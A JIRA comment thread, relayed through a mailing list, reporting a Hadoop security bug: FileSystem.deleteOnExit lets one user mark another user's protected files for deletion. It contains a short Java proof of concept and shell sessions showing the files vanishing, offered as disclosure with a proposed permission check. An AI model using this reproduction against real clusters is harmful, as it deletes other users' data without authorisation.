[ 
https://issues.apache.org/jira/browse/HADOOP-15725?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16608859#comment-16608859
 ] 

Oleksandr Shevchenko commented on HADOOP-15725:
-----------------------------------------------

[~eyang] Thank you for your attention to this issue. I took into account and 
checked your comments.

The problem is not related to HDFS admin user or kerberos/non-kerberos cluster. 
I able to reproduce the same issue with a not-admin user on both secure and 
insecure cluster.
{noformat}
1) Run program behalf of "hive" user and delete file with "700 hive:hive" 
permissions behalf of "hive2" user
hive@node:~$ hadoop fs -ls /user/hive
Found 2 items
-rwx------ 1 hive hive 0 2018-09-10 07:02 /user/hive/testfile
drwxrwxr-x - root supergroup 0 2018-09-10 06:57 /user/hive/warehouse
hive@node:~$ java -jar testDeleteOther.jar 
DFS[DFSClient[clientName=DFSClient_NONMAPREDUCE_-1314892313_1, ugi=hive 
(auth:SIMPLE)]]
/user/hive/testfile
hive2 (auth:SIMPLE)
hive@node:~$ hadoop fs -ls /user/hive
Found 1 items
drwxrwxr-x - root supergroup 0 2018-09-10 06:57 /user/hive/warehouse
hive@node:~$ id
uid=1000(hive) gid=1000(hive) groups=1000(hive)
hive@node:~$

2) Run program behalf of "hive" user and delete file with "700 hive:hive" 
permissions behalf of "hive2" user
[hive@node ~]$ hadoop fs -ls /hive
Found 1 items
-rwx------ 1 hive hive 0 2018-09-10 07:56 /hive/testfile
[hive@node ~]$  java -jar testDeleteOther.jar
DFS[DFSClient[clientName=DFSClient_NONMAPREDUCE_-1980008782_1, 
ugi=h...@example.com (auth:KERBEROS)]]
/hive/testfile
hive2 (auth:KERBEROS)
[hive@node ~]$ hadoop fs -ls /hive
[hive@node ~]$
{noformat}

The main cause of the problem is we allow to add any file by any user to delete 
list without checking permissions of a file for a user if we have a link on 
file system object which was created by another user.

I agree with you that not easy to exploit this vulnerability as we need to have 
a link on a file system object. Especially on the secured cluster (user should 
have kerberos ticket). But I think this is still a problem. Even if some user 
does not want to exploit this bug, we still have incorrect behavior that can 
lead to accidental deletion of files.
I propose to add permissions check during adding files to deleteOnExit list and 
throw AccessControlException in a case when a user who adds a file doesn't have 
enough permissions to delete a file.

> FileSystem.deleteOnExit should check user permissions
> -----------------------------------------------------
>
>                 Key: HADOOP-15725
>                 URL: https://issues.apache.org/jira/browse/HADOOP-15725
>             Project: Hadoop Common
>          Issue Type: Bug
>            Reporter: Oleksandr Shevchenko
>            Priority: Major
>              Labels: Security
>         Attachments: deleteOnExitReproduce
>
>
> For now, we able to add any file to FileSystem deleteOnExit list. It leads to 
> security problems. Some user (Intruder) can get file system instance which 
> was created by another user (Owner) and mark any files to delete even if 
> "Intruder" doesn't have any access to this files. Later when "Owner" invoke 
> close method (or JVM is shut down since we have ShutdownHook which able to 
> close all file systems) marked files will be deleted successfully since 
> deleting was do behalf of "Owner" (or behalf of a user who ran a program).
> I attached the patch [^deleteOnExitReproduce] which reproduces this 
> possibility and also I able to reproduce it on a cluster with both Local and 
> Distributed file systems:
> {code:java}
> public class Main {
> public static void main(String[] args) throws Exception {
> final FileSystem fs;
>  Configuration conf = new Configuration();
>  conf.set("fs.default.name", "hdfs://node:9000");
>  conf.set("fs.hdfs.impl",
>  org.apache.hadoop.hdfs.DistributedFileSystem.class.getName()
>  );
>  fs = FileSystem.get(conf);
>  System.out.println(fs);
> Path f = new Path("/user/root/testfile");
>  System.out.println(f);
> UserGroupInformation hive = UserGroupInformation.createRemoteUser("hive");
> hive.doAs((PrivilegedExceptionAction<Boolean>) () -> fs.deleteOnExit(f));
> fs.close();
>  }
> {code}
> Result:
> {noformat}
> root@node:/# hadoop fs -put testfile /user/root
> root@node:/# hadoop fs -chmod 700 /user/root/testfile
> root@node:/# hadoop fs -ls /user/root
> Found 1 items
> -rw------- 1 root supergroup 0 2018-09-06 18:07 /user/root/testfile
> root@node:/# java -jar testDeleteOther.jar 
> log4j:WARN No appenders could be found for logger 
> (org.apache.hadoop.conf.Configuration.deprecation).
> log4j:WARN Please initialize the log4j system properly.
> log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more 
> info.
> DFS[DFSClient[clientName=DFSClient_NONMAPREDUCE_309539034_1, ugi=root 
> (auth:SIMPLE)]]
> /user/root/testfile
> []
> root@node:/# hadoop fs -ls /user/root
> root@node:/# 
> {noformat}
> We should add a check user permissions before mark a file to delete. 
>  Could someone evaluate this? And if no one objects I would like to start 
> working on this.
>  Thanks a lot for any comments.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

---------------------------------------------------------------------
To unsubscribe, e-mail: common-issues-unsubscr...@hadoop.apache.org
For additional commands, e-mail: common-issues-h...@hadoop.apache.org

Reply via email to